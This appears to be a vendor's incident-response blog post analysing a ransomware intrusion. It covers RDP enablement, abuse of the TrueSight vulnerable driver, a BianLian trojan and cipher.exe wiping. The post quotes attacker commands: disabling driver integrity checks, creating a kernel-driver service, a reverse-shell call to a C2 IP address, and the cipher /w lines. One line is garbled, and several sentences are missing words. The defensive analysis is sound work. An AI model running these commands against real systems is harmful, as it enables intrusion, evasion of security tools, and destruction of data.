Background
ĢTV analysts observe and block a wide variety of attacks on a weekly basis. Some of these attacks may be initial forays into the compromised infrastructure, attempts to launch ransomware, or even successful ransomware deployments.
During the second week of September 2024, a monitored endpoint triggered alerts for enabling RDP, multiple commands for disabling recovery of the system, and persistence for a ransomware executable. Shortly afterward (less than 20 minutes), the endpoint again triggered alerts, this time for modified ransomware canaries, indicating that files were encrypted. Visibility within the infrastructure was extremely limited, as the ĢTV agent hadn't been completely deployed to all endpoints. As such, only the impacted endpoint could be more thoroughly investigated.
The Attack
The first indication of the attack was observed within the investigative timeline as the Administrator account credentials were used to access the [.highlight]C$[.highlight] share from an internal IP address. The threat actor then ran a remote command via [.highlight]reg.exe[.highlight] to enable RDP, as illustrated in Figure 1.
The threat actor then attempted to log in via RDP; however, the first attempt failed, as they misspelled the account name as “[.highlight]adminitrator[.highlight]” (note the missing “s”). Over a minute and half later, they successfully logged in from a source endpoint with the workstation name [.highlight]HOME-PC[.highlight].
The threat actor then executed [.highlight]C:\Users\REDACTED\AppData\Roaming\trend micro\Trend.exe[.highlight]. A copy of this file was collected from the endpoint, and found to contain the string, [.highlight]F:\Users\admin\Downloads\TrueSightKiller-main\TrueSightKiller-main\x64\Release\TrueSightKiller.pdb[.highlight], indicating that it was likely used to install [.highlight]truesight.sys[.highlight], the . The embedded file version information within the driver appears as illustrated in Figure 2.
[.highlight]Truesight.sys[.highlight] is known to be a vulnerable driver and is used in a number of . For example, ĢTV analysts have observed this vulnerable driver being leveraged during attacks. Immediately after the driver was installed, the security applications running on the endpoint (in this case, Trend Micro products) crashed, seen in the investigative timeline via System Event Log records.
In this incident, the installer EXE (named [.highlight]trend.exe[.highlight]) and driver had been placed in the [.highlight]C:\Users\REDACTED\AppData\Roaming\trend micro\[.highlight] folder, likely indicating that the threat actor had prior knowledge of security tools installed throughout the infrastructure.
The next files to be executed were [.highlight]readtext34.exe[.highlight] and [.highlight]winppx.exe[.highlight], both found in the [.highlight]C:\Users\REDACTED\AppData\Roaming[.highlight] folder. When launched, the [.highlight]winppx.exe[.highlight] file proceeded to run the following commands:
[.highlight]bcdedit.exe /set loadoptions DDISABLE_INTEGRITY_CHECKS[.highlight]
[.highlight]sc create winppx binPath="C:\Windows\winppx.exe" type=kernel[.highlight]
[.highlight]start=boot error=normal tag=no DisplayName="winppx"[.highlight]
The first command, running [.highlight]bcdedit.exe[.highlight], is intended to disable the driver signature check prior to installing the kernel driver. However, records across the System, Security, and Application Event Log indicated that the [.highlight]winppx.exe[.highlight] failed to load. Those records appeared within the investigative timeline, all within the same second, as follows:
[.highlight]EVTX REDACTED - Service Control Manager/7000;winppx,%577[.highlight]
[.highlight]EVTX REDACTED - Service Control Manager/7045;[.highlight]
[.highlight]winppx,C:\Windows\winppx.exe,kernel mode driver,boot start,[.highlight]
[.highlight]EVTX REDACTED - Microsoft-Windows-Security-Auditing/4658;[.highlight]
[.highlight]S-1-5-21-4140347413-16511891-3320662292-500,Administrator,[.highlight]
[.highlight]REDACTED,0x3ac505,Security,0x4bc,0x366c,[.highlight]
[.highlight]C:\Users\REDACTED\AppData\Roaming\winppx.exe[.highlight]
[.highlight]EVTX REDACTED - Application Popup/26;[.highlight]
[.highlight],\SystemRoot\winppx.exe failed to load[.highlight]
[.highlight]EVTX REDACTED - Microsoft-Windows-Security-Auditing/5038;[.highlight]
.ٱհٱ𱹾Ჹ徱մDZܳ6¾ԻǷɲɾԱ..ٱ
The [.highlight]Microsoft-Windows-Security-Auditing/5038[.highlight] event record indicates that the image hash of the file was not valid. Even though the driver did not appear to load, the file did run the following command, launching what appears to be a reverse shell:
[.highlight]"svhost.exe" -connect 94.198.50[.]195:25000 -pass Zz158df@jniow45h@ -recn 0 -rect 5[.highlight]
A search of VirusTotal for the IP address results in the banner illustrated in Figure 3.
The of the VirusTotal page includes multiple references to the IP address being the C2 address for the BianLian Go Trojan, which correlates to the anti-virus detection illustrated in Figure 4.
It is interesting to note that launching the instance of [.highlight]winppx.exe[.highlight] apparently resulted in multiple persistence mechanisms, including copying the file to the Startup folder within the ProgramData directory, as well as attempting to install it as a kernel driver.
The first observed command run as a child process of [.highlight]readtext34.exe[.highlight] was the following:
[.highlight]cmd.exe /c rem Kill "SQL"[.highlight]
This is a clear indication of a batch file-style list of commands embedded within the executable. Following this command, a series of [.highlight]taskkill.exe[.highlight] commands were run, something often seen embedded within file encryption executables as a means of stopping running processes from inhibiting the file encryption process. As observed in this instance, very often, the list of processes stopped is independent of the processes actually executing on the endpoint. These were followed by a series of "[.highlight]net stop[.highlight]" commands to halt various Windows services, as well as commands intended to inhibit recovery by deleting Volume Shadow Copies and system backups.
The [.highlight]readtext34.exe[.highlight] executable was also set up to persist via the compromised Administrator account’s Run key, as illustrated in Figure 5.
Finally, the threat actor ran the following command:
[.highlight]readtext34.exe -network[.highlight]
This command then spawned the following child commands, launching a native Windows utility (LOLBin) to perform encryption:
[.highlight]cipher /w:\\?\X:[.highlight]
[.highlight]cipher /w:\\?\F:[.highlight]
[.highlight]cipher /w:\\?\I:[.highlight]
[.highlight]cipher /w:\\?\G:[.highlight]
[.highlight]cipher /w:\\?\H:[.highlight]
[.highlight]cipher /w:\\?\E:[.highlight]
[.highlight]cipher /w:\\?\B:[.highlight]
[.highlight]cipher /w:\\?\D:[.highlight]
[.highlight]cipher /w:\\?\C:[.highlight]
[.highlight]cipher /w:\\?\A:[.highlight]
The [.highlight]cipher.exe[.highlight] native Windows utility is a command line tool that administrators can use to manage encrypted data using the Encrypted File System. The “[.highlight]/w[.highlight]” option, from typing the command [.highlight]cipher /?[.highlight], has the effect illustrated in Figure 6.
In short, the use of the [.highlight]cipher.exe[.highlight] command does not encrypt files, but rather adds a layer of complexity to recovery by removing data from unallocated space within the volume.
Following these commands, files were encrypted, which led to ransomware canaries triggering alerts. The ransom note, titled [.highlight]How_to_back_files.html[.highlight], indicates that the file encryption process utilized “RSA+AES”. The ransom note also includes a “personal ID” for the customer, email addresses to contact the threat actor, and the admonition that if contact is not made within 72 hours, the ransom price will increase. The ransom note also states that “highly confidential/personal data” was gathered and stored on a private server. Within the limits and confines of this investigation, there was no indication of data staging nor exfiltration commands, indicating that if they did occur, they occurred sometime prior to the investigated attack, and/or via endpoints that did not have the ĢTV agent installed.
Conclusion
Cyber attacks can have a detrimental impact on organizations, in general, with ransomware attacks being not only devastating but also highly visible. As a result, organizations should strongly consider developing and regularly exercising incident response plans, as well as developing a thorough asset inventory and engaging in attack surface reduction efforts. Last but not least, endpoint monitoring efforts are most effective when all endpoints (servers and workstations) are included in the monitoring.
IOCs
Sign Up for Blog Updates
Subscribe today and you’ll be the first to know when new content hits the blog.